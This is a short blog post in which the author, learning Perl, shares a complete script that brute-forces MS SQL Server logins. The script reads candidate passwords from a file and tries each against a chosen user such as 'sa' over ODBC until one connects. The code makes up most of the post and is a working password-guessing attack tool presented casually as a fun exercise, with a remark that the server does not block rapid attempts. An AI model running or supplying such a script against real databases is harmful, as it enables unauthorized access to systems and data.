Never really programmed in perl, but this afternoon i had lots of fun learning it and doing a small brute force vs ms sql. I was expecting sql server would block this fast attemps to the database, it does not.
Comparing to .net, this is way funnier and faster to code.
Improving code sounds a fun thing to do as well, since there's a lot to improve!
Obviously there are tons of code that do this and in a much better way, but this was for fun only.
#!/usr/bin/perl -w
use strict;
use warnings;
use DBI;
my $odbcdriver=""; # your odbc driver has to be installed on the client machine
my $dbuser=""; # ms sql default is sa, try other username if you want
if ( $#ARGV <1 )
{
print "\nUSAGE 1: perl brut.pl _ODBCDRIVER_ _user_ \n";
die("");
}
else
{
$odbcdriver=$ARGV[0];
$dbuser=$ARGV[1];
}
my $data_source="dbi:ODBC:".$odbcdriver;
my $dbh;
my $pwd;
open(my $in, "<", "passwords.txt") or die "Can't open passwords.txt: $!";
while ( <$in>) {
chomp($_);
$dbh = DBI->connect($data_source, $dbuser, $_);
if($dbh)
{
print "=>".$_;
print ("=>SUCCESS!\n");
$dbh->disconnect;
die("... boink...");
}
else
{
print "=>".$_;
print("=>NO FUN!\n");
}
}
Sem comentários:
Enviar um comentário